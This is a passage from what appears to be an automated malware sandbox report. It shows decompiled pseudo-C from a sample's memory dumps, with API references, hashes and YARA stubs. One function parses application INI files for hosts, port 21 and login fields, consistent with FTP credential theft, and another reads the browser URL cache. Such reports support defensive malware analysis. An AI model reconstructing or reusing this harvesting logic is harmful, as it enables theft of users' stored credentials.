						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040BB61(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E00419DAA(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x00419e89
0x00419e8c
0x00419e90
0x00419e93
0x00419e9b
0x00419eb8
0x00419ec0
0x00000000
0x00000000
0x00419ec2
0x00419edd
0x00419ee5
0x00419efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00419f01
0x00419f01
0x00419f01
0x00419f17
0x00419f1f
0x00419f26
0x00419f51
0x00419f56
0x00419f59
0x00419f5c
0x0041a073
0x0041a076
0x0041a0bb
0x0041a0c0
0x0041a0eb
0x0041a0f0
0x0041a00a
0x0041a00e
0x0041a00e
0x0041a0f6
0x0041a0f8
0x0041a0f8
0x0041a0fb
0x00000000
0x00000000
0x0041a101
0x0041a104
0x00419ff9
0x00419ff9
0x00419fff
0x0041a000
0x0041a005
0x0041a008
0x00000000
0x0041a008
0x0041a10a
0x0041a10a
0x0041a10d
0x0041a110
0x00000000
0x0041a110
0x0041a0c5
0x0041a0c8
0x0041a0cd
0x00000000
0x00000000
0x0041a0da
0x0041a0e6
0x00000000
0x0041a0e6
0x0041a078
0x00419fc7
0x00419fc7
0x00419fca
0x00419f45
0x00419f45
0x00000000
0x00419f45
0x0041a07e
0x0041a081
0x0041a035
0x0041a035
0x0041a03a
0x0041a04e
0x0041a04e
0x00000000
0x0041a03a
0x0041a083
0x0041a086
0x0041a0a6
0x0041a0ab
0x00419f9f
0x00419f9f
0x00419fa4
0x00419fa4
0x00000000
0x00000000
0x00000000
0x00419fa6
0x00419ff4
0x00419ff4
0x00000000
0x00419ff4
0x0041a088
0x0041a08b
0x00000000
0x00000000
0x0041a091
0x0041a096
0x00000000
0x00000000
0x0041a09c
0x00000000
0x0041a09c
0x00419f62
0x0041a055
0x0041a05a
0x00000000
0x00000000
0x0041a060
0x0041a063
0x0041a06a
0x00000000
0x00000000
0x0041a06c
0x00000000
0x0041a06c
0x00419f68
0x00419f6b
0x0041a023
0x0041a028
0x00000000
0x00000000
0x0041a02a
0x0041a02f
0x00000000
0x00000000
0x00000000
0x0041a02f
0x00419f71
0x00419f74
0x00419fed
0x00419ff2
0x0041a011
0x0041a016
0x00000000
0x00000000
0x0041a01c
0x00000000
0x0041a01c
0x00000000
0x00419ff2
0x00419f76
0x00419f79
0x00419fd0
0x00419fd5
0x00419fe0
0x00419fe5
0x00000000
0x00000000
0x00419fe7
0x00419fe9
0x00419fdb
0x00419fdb
0x00000000
0x00419fdb
0x00419fd7
0x00419fd9
0x00000000
0x00419fd9
0x00419f7e
0x00419f81
0x00000000
0x00000000
0x00419f83
0x00419f88
0x00419fbc
0x00419fc1
0x00419fc4
0x00000000
0x00419fc4
0x00419f8a
0x00419f8f
0x00000000
0x00000000
0x00419f91
0x00419f96
0x00000000
0x00000000
0x00419f98
0x00419f9d
0x00000000
0x00000000
0x00000000
0x00419f9d
0x00419f2e
0x00419f33
0x00419f39
0x00419f40
0x00000000
0x00419f40

APIs

GetAncestor.USER32(?,00000002), ref: 00419EB2
SendMessageTimeoutW.USER32 ref: 00419EDD
PostMessageW.USER32(?,00000020,?,00000000), ref: 00419F1F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00419FB5
PostMessageW.USER32(?,00000112,?,?), ref: 0041A008
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A047

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
Instruction ID: dfeb2fe246d3d7e526f7f6e31d07448cf0de1564f34f95a55f0b2426e05824b5
Opcode Fuzzy Hash: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
Instruction Fuzzy Hash: C5518D31600309BAEF304E18CD99BFE3A65EB09344F244527F945D62E1C27EDDE2A65B

Uniqueness

Uniqueness Score: -1.00%

Function 00419E89, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00419E89(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E00419DAA(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E00419C1A(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040BB61(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E00419DAA(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

APIs

GetAncestor.USER32(?,00000002), ref: 00419EB2
SendMessageTimeoutW.USER32 ref: 00419EDD
PostMessageW.USER32(?,00000020,?,00000000), ref: 00419F1F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00419FB5
PostMessageW.USER32(?,00000112,?,?), ref: 0041A008
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A047

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
Instruction ID: dfeb2fe246d3d7e526f7f6e31d07448cf0de1564f34f95a55f0b2426e05824b5
Opcode Fuzzy Hash: 97cdfd520a455733afc587644e0d2fa9c6f90aa6e1801447c7e3d09afd58463d
Instruction Fuzzy Hash: C5518D31600309BAEF304E18CD99BFE3A65EB09344F244527F945D62E1C27EDDE2A65B

Uniqueness

Uniqueness Score: -1.00%

Function 00409813, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409813(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E00411CCE(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E00411CFE(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00412BAE(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E00411CCE(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E00419897(_t61,  &_v584);
						_t63 = 0x73;
						E00419897(_t63,  &_v596);
						_t65 = 0x74;
						E00419897(_t65,  &_v608);
						_t67 = 0x75;
						E00419897(_t67,  &_v624);
						_t69 = 0x76;
						E00419897(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E00412BEA(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E0041284D(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E00419897(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E004129F1(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E004120F2(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E00411CFE(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E004097DB(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x00409819
0x00409837
0x00409a2d
0x00409a35
0x00409a35
0x0040983d
0x00409840
0x00409861
0x00409865
0x00409869
0x0040986b
0x00000000
0x00000000
0x00409888
0x0040988a
0x0040988c
0x00409a27
0x00409a28
0x00000000
0x00409a28
0x00409892
0x00409897
0x0040989c
0x0040989e
0x00000000
0x00000000
0x004098ae
0x004098b0
0x004098b4
0x004098b6
0x004098bc
0x004098c4
0x004098c8
0x004098d0
0x004098d1
0x004098dc
0x004098dd
0x004098e8
0x004098e9
0x004098f4
0x004098f5
0x00409900
0x00409901
0x00409906
0x00409a03
0x00409a09
0x00409a0e
0x00409a12
0x00409a14
0x00409908
0x0040990c
0x00409915
0x0040991b
0x0040991d
0x0040993d
0x0040993f
0x00409941
0x0040995a
0x00409960
0x00409965
0x0040996a
0x00409979
0x0040998b
0x0040998d
0x0040998f
0x0040999a
0x0040999a
0x004099ac
0x004099ae
0x004099b0
0x004099b4
0x004099b9
0x004099bb
0x004099bf
0x004099c3
0x004099c4
0x004099c9
0x004099cd
0x004099d3
0x004099dd
0x004099de
0x004099e5
0x004099ea
0x004099ed
0x004099ef
0x004099f1
0x004099f7
0x004099fc
0x004099fe
0x00409a00
0x00409a00
0x00409a00
0x00409a00
0x004099fe
0x004099ef
0x004099bb
0x004099b0
0x0040998f
0x0040996a
0x00409941
0x00000000
0x0040991d
0x00409a1e
0x00409a23
0x00409a23
0x00000000
0x00409842
0x0040984d
0x00000000
0x0040984d

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

GetPrivateProfileStringW.KERNEL32 ref: 00409888
StrStrIW.SHLWAPI(?,?), ref: 00409915
GetPrivateProfileStringW.KERNEL32 ref: 0040993D
GetPrivateProfileIntW.KERNEL32 ref: 0040995A
GetPrivateProfileStringW.KERNEL32 ref: 0040998B

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 697b6d238aea26d2ca22bc44603dbc5fe0e82df11673bc0a19a6bcf8d87854b2
Instruction ID: c147e4dfb0c90b59585134127e858cb964f9ea13a8f2a33957826684169cd013
Opcode Fuzzy Hash: 697b6d238aea26d2ca22bc44603dbc5fe0e82df11673bc0a19a6bcf8d87854b2
Instruction Fuzzy Hash: 3D518572604346AADA10EB55CC01BEBB7E8EFC5704F00093EF998E3192DB78DD458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040E65D, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E65D(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x422aa4);
				_t99 = _a4;
				_t55 = E0040DEC2( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x422aa4);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x422abc;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E00413083(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E00411D3A(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x422aa4);
					_v5 = E0040E544( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x422aa4);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E0040DEC2( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E00411CFE(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x422abc;
					_t101 = E00413E34( &_v24, _t105);
					_t79 = E0041BA1E( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E00411CFE(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E00411F3E(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E00411CCE(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E00411CFE(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E00416EB9(_t91, _v12, _v20);
							}
						}
					}
					E00411CFE(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x0040e663
0x0040e66e
0x0040e674
0x0040e679
0x0040e681
0x0040e82c
0x0040e831
0x0040e83d
0x0040e83d
0x0040e68a
0x0040e694
0x00000000
0x00000000
0x0040e69b
0x0040e6a1
0x0040e6b5
0x0040e6b8
0x0040e6ba
0x0040e6bc
0x0040e6bc
0x0040e6bc
0x0040e6bf
0x0040e6c3
0x0040e7ce
0x0040e7ce
0x0040e7d1
0x0040e7d4
0x0040e7d6
0x0040e7da
0x0040e7dc
0x0040e7dc
0x0040e7df
0x0040e7e1
0x0040e7e3
0x0040e7e7
0x0040e7f8
0x0040e7f8
0x0040e7fb
0x0040e7fe
0x0040e802
0x0040e806
0x0040e813
0x0040e818
0x0040e818
0x0040e818
0x0040e818
0x0040e806
0x0040e81b
0x0040e81e
0x0040e820
0x0040e822
0x0040e822
0x0040e824
0x0040e824
0x0040e7da
0x00000000
0x0040e7d4
0x0040e6d1
0x0040e6eb
0x0040e6ee
0x0040e6f4
0x0040e6f8
0x0040e7bf
0x0040e7bf
0x0040e7bf
0x0040e7bf
0x0040e7c8
0x00000000
0x0040e7c8
0x0040e701
0x0040e703
0x0040e708
0x0040e70b
0x0040e7ba
0x00000000
0x0040e7ba
0x0040e71e
0x0040e728
0x0040e736
0x0040e73b
0x0040e73d
0x0040e7a3
0x0040e7a4
0x0040e7ac
0x0040e7b2
0x00000000
0x0040e7b2
0x0040e745
0x0040e74a
0x0040e74d
0x0040e74f
0x00000000
0x00000000
0x0040e756
0x0040e75e
0x0040e760
0x0040e762
0x0040e79b
0x0040e79e
0x00000000
0x0040e79e
0x0040e76c
0x0040e772
0x0040e778
0x0040e77a
0x0040e77c
0x0040e77f
0x0040e781
0x0040e783
0x0040e787
0x0040e790
0x0040e790
0x0040e787
0x0040e781
0x0040e796
0x00000000
0x0040e6ab
0x0040e6ae
0x0040e82b
0x00000000
0x0040e82b

APIs

EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E66E
LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E6D1
EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E6EE
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0040E772
SetLastError.KERNEL32(00002EE4), ref: 0040E7C8
LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E831

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 457f56e62f8edac2a39dede2ab6e20b98cc474391faafba1c6d035a264bd2a22
Instruction ID: c4b01e0a972c91f95f33b46e61665e809106921f95c238847ac81fabb73dabc9
Opcode Fuzzy Hash: 457f56e62f8edac2a39dede2ab6e20b98cc474391faafba1c6d035a264bd2a22
Instruction Fuzzy Hash: 04519231A00215AFCF14EF66C984B9E7BB4AF04314F14496AF910BB2E1D778D991CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040941C, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040941C(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E00411CCE(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E00411CFE(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00412BAE(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E00411CCE(0xc08);
